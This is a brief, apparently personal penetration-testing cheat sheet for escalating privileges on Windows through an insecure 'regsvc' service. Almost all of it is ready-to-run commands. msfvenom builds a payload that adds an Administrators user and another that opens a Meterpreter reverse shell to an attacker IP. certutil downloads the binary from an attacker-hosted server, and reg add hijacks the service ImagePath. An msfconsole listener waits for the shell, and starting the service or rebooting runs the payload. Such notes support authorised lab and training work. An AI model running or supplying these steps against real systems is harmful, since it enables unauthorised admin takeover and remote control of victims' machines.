Exploiting Insecure Service with Metasploit¶
-
Create a binary to add a user to the Administrators group with msfvenom
msfvenom -p windows/x64/exec CMD='net localgroup Administrators [USERNAME] /add' -f exe > hackfast.exe
-
Host the binary using a Python HTTP server and transfer it to the target machine with certutil
certutil -urlcache -f http://[IP-ADDRESS]:8001/hackfast.exe hackfast.exe
-
Change the ImagePath on the regsvc service registry key to point to the malicious executable
reg add "HKLM\SYSTEM\CurrentControlSet\services\regsvc" /v ImagePath /t REG_EXPAND_SZ /d c:\temp\hackfast.exe /f
Note: Verify if ImagePath was set properly with the following command:
reg query "HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\regsvc" -
Run
net start regsvcon the target to execute the exploit
Note: If
SeShutdownPrivilegeis enabled, reboot to have the service restart automaticallyshutdown /r /t 0
Generating Reverse Shell with msfvenom¶
-
Create a reverse shell binary with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp -f exe LHOST=[ATTACKER-IP] LPORT=[PORT] -o hackfast.exe
-
Host the binary using a Python HTTP server and transfer it to the target machine with certutil
certutil -urlcache -f http://[IP-ADDRESS]:8001/hackfast.exe hackfast.exe
-
Change the ImagePath on the regsvc service registry key to point to the malicious executable
reg add "HKLM\SYSTEM\CurrentControlSet\services\regsvc" /v ImagePath /t REG_EXPAND_SZ /d c:\temp\hackfast.exe /f
Note: Verify if ImagePath was set properly with the following command:
reg query "HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\regsvc" -
Start a listener on the attacking machine
msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT [PORT]; run"
-
Run
net start regsvcon the target machine to execute the exploit
Note: If SeShutdownPrivilegeis enabled, reboot to have the service restart automatically
shutdown /r /t 0